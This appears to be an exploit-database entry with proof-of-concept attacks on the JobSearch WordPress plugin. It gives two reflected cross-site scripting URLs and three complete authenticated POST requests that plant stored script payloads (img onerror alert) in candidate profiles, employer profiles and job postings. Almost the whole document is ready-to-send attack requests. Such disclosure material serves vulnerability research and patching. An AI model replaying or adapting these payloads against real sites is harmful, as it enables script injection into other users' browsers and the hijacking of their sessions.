## https://sploitus.com/exploit?id=WPEX-ID:10290
### [ PoC Unauthenticated Reflected XSS (via the `location` and `sector_cat` query parameters): ]

https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60XSS%60%29%3B%20%22%3E
https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60XSS%60%29%3B%2F%2F%22%3E1%22--%3E



### [ PoC Authenticated Persistent XSS -> Candidate User Profile (dashboard-settings form, candidate role): ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile (dashboard-settings form, employer role): ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`)//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page (post-new-jobs form): ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--